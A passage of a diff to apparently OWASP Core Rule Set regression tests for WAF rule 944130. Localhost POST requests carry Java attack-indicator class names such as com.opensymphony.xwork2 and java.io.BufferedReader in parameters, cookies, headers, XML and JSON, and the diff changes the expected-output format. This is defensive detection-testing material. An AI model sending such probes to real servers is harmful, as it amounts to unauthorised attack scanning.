"HTTP/1.0" - data: "com.opensymphony.xwork2" - output: - log_contains: "id \"944130\"" - - test_title: 944130-8 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "com.opensymphony.xwork2" + output: + log: + expect_ids: [944130] + - test_id: 8 desc: "Nested XML element value includes keyword com.opensymphony.xwork2" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "com.opensymphony.xwork2" - output: - log_contains: "id \"944130\"" - - test_title: 944130-9 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "com.opensymphony.xwork2" + output: + log: + expect_ids: [944130] + - test_id: 9 desc: "Content-Type text/plain includes keyword com.opensymphony.xwork2" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=com.opensymphony.xwork2" - output: - log_contains: "id \"944130\"" - - test_title: 944130-10 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=com.opensymphony.xwork2" + output: + log: + expect_ids: [944130] + - test_id: 10 desc: "Content-Type application/json arg value includes keyword com.opensymphony.xwork2" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"com.opensymphony.xwork2\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-11 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"com.opensymphony.xwork2\"}" + output: + log: + expect_ids: [944130] + - test_id: 11 desc: "Content-Type application/json arg name includes keyword com.opensymphony.xwork2" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"com.opensymphony.xwork2\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-12 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"com.opensymphony.xwork2\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 12 desc: "Argument test includes keyword com.sun.org.apache" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=com.sun.org.apache" - output: - log_contains: "id \"944130\"" - - test_title: 944130-13 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=com.sun.org.apache" + output: + log: + expect_ids: [944130] + - test_id: 13 desc: "Argument name includes keyword com.sun.org.apache" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "com.sun.org.apache=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-14 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "com.sun.org.apache=test" + output: + log: + expect_ids: [944130] + - test_id: 14 desc: "Cookie test includes keyword com.sun.org.apache" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=com.sun.org.apache - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-15 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=com.sun.org.apache + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 15 desc: "Cookie name includes keyword com.sun.org.apache" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: com.sun.org.apache=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-16 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: com.sun.org.apache=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 16 desc: "Request header test includes keyword com.sun.org.apache" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: com.sun.org.apache - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-17 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: com.sun.org.apache + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 17 desc: "XML attribute value includes keyword com.sun.org.apache" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-18 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 18 desc: "XML element value includes keyword com.sun.org.apache" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "com.sun.org.apache" - output: - log_contains: "id \"944130\"" - - test_title: 944130-19 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "com.sun.org.apache" + output: + log: + expect_ids: [944130] + - test_id: 19 desc: "Nested XML element value includes keyword com.sun.org.apache" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "com.sun.org.apache" - output: - log_contains: "id \"944130\"" - - test_title: 944130-20 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "com.sun.org.apache" + output: + log: + expect_ids: [944130] + - test_id: 20 desc: "Content-Type text/plain includes keyword com.sun.org.apache" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=com.sun.org.apache" - output: - log_contains: "id \"944130\"" - - test_title: 944130-21 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=com.sun.org.apache" + output: + log: + expect_ids: [944130] + - test_id: 21 desc: "Content-Type application/json arg value includes keyword com.sun.org.apache" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"com.sun.org.apache\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-22 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"com.sun.org.apache\"}" + output: + log: + expect_ids: [944130] + - test_id: 22 desc: "Content-Type application/json arg name includes keyword com.sun.org.apache" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"com.sun.org.apache\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-23 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"com.sun.org.apache\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 23 desc: "Argument test includes keyword java.io.BufferedInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.BufferedInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-24 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.BufferedInputStream" + output: + log: + expect_ids: [944130] + - test_id: 24 desc: "Argument name includes keyword java.io.BufferedInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.BufferedInputStream=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-25 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.BufferedInputStream=test" + output: + log: + expect_ids: [944130] + - test_id: 25 desc: "Cookie test includes keyword java.io.BufferedInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.BufferedInputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-26 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.BufferedInputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 26 desc: "Cookie name includes keyword java.io.BufferedInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.BufferedInputStream=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-27 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.BufferedInputStream=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 27 desc: "Request header test includes keyword java.io.BufferedInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.BufferedInputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-28 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.BufferedInputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 28 desc: "XML attribute value includes keyword java.io.BufferedInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-29 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 29 desc: "XML element value includes keyword java.io.BufferedInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.BufferedInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-30 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.BufferedInputStream" + output: + log: + expect_ids: [944130] + - test_id: 30 desc: "Nested XML element value includes keyword java.io.BufferedInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.BufferedInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-31 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.BufferedInputStream" + output: + log: + expect_ids: [944130] + - test_id: 31 desc: "Content-Type text/plain includes keyword java.io.BufferedInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.BufferedInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-32 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.BufferedInputStream" + output: + log: + expect_ids: [944130] + - test_id: 32 desc: "Content-Type application/json arg value includes keyword java.io.BufferedInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.BufferedInputStream\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-33 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.BufferedInputStream\"}" + output: + log: + expect_ids: [944130] + - test_id: 33 desc: "Content-Type application/json arg name includes keyword java.io.BufferedInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.BufferedInputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-34 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.BufferedInputStream\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 34 desc: "Argument test includes keyword java.io.BufferedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.BufferedReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-35 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.BufferedReader" + output: + log: + expect_ids: [944130] + - test_id: 35 desc: "Argument name includes keyword java.io.BufferedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: 